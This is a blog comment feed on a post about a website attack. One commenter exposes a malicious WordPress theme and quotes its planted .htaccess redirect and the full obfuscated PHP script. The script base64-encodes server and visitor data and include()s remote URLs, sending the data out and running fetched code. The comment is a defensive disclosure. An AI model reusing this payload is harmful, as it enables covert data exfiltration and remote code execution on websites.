Comments on: Anatomy Of An Attack http://urbangiraffe.com/2007/06/28/anatomy-of-an-attack/ Software and opinions roaming wild in China Fri, 25 Jul 2008 14:13:12 +0000 http://wordpress.org/?v=2.6 By: John http://urbangiraffe.com/2007/06/28/anatomy-of-an-attack/#comment-40304 John Mon, 19 Nov 2007 01:27:55 +0000 http://urbangiraffe.com/2007/06/28/anatomy-of-an-attack/#comment-40304 I agree that I wouldn't be too happy with that information being sent somewhere. It's not difficult to provide it as an option, or to even include it in a disclaimer. I agree that I wouldn't be too happy with that information being sent somewhere. It's not difficult to provide it as an option, or to even include it in a disclaimer.

]]> By: Cem Gencer http://urbangiraffe.com/2007/06/28/anatomy-of-an-attack/#comment-40216 Cem Gencer Sun, 18 Nov 2007 14:11:43 +0000 http://urbangiraffe.com/2007/06/28/anatomy-of-an-attack/#comment-40216 I just discovered that one theme i've used generated some weird .htaccess files in my sub-dirs, which redirected the 404-page to a included script, which passed some bunch of my server-variables to 2 urls as querystrings. if this was aimed for statistics ıf usage, it is not a fine way to do it, without asking the owner first. this is the .htaccess found on various paths: <code>Options -MultiViews ErrorDocument 404 //wp-content/themes/194773.php</code> and this is the called script, which passes my datas to 2 base64 encoded urls. arent there many base64 decoders available online? do they think they are the only smart-asses? how lame! <code>error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".". base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLndz")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My54bWxkYXRhLmluZm8=")."/?".$str);}</code> I just discovered that one theme i've used generated some weird .htaccess files in my sub-dirs, which redirected the 404-page to a included script, which passed some bunch of my server-variables to 2 urls as querystrings. if this was aimed for statistics ıf usage, it is not a fine way to do it, without asking the owner first.

this is the .htaccess found on various paths:
Options -MultiViews
ErrorDocument 404 //wp-content/themes/194773.php

and this is the called script, which passes my datas to 2 base64 encoded urls. arent there many base64 decoders available online? do they think they are the only smart-asses? how lame!

error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".
base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLndz")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My54bWxkYXRhLmluZm8=")."/?".$str);}

]]> By: ScottS-M http://urbangiraffe.com/2007/06/28/anatomy-of-an-attack/#comment-31991 ScottS-M Fri, 29 Jun 2007 14:26:18 +0000 http://urbangiraffe.com/2007/06/28/anatomy-of-an-attack/#comment-31991 Oops sorry I didn't notice your own plugin tracks 404s and does additional handy stuff. Need to click through the links before commenting. Oops sorry I didn't notice your own plugin tracks 404s and does additional handy stuff. Need to click through the links before commenting.

]]> By: ScottS-M http://urbangiraffe.com/2007/06/28/anatomy-of-an-attack/#comment-31990 ScottS-M Fri, 29 Jun 2007 14:24:27 +0000 http://urbangiraffe.com/2007/06/28/anatomy-of-an-attack/#comment-31990 Have you seen Alex King's 404 Notifier? Kind of handy for keeping track of the weird URL's that are feeding into your site. Though it does tend to fill up with 404's from comment-XXXX from Akismet-blocked spam. Have you seen Alex King's 404 Notifier? Kind of handy for keeping track of the weird URL's that are feeding into your site. Though it does tend to fill up with 404's from comment-XXXX from Akismet-blocked spam.

]]>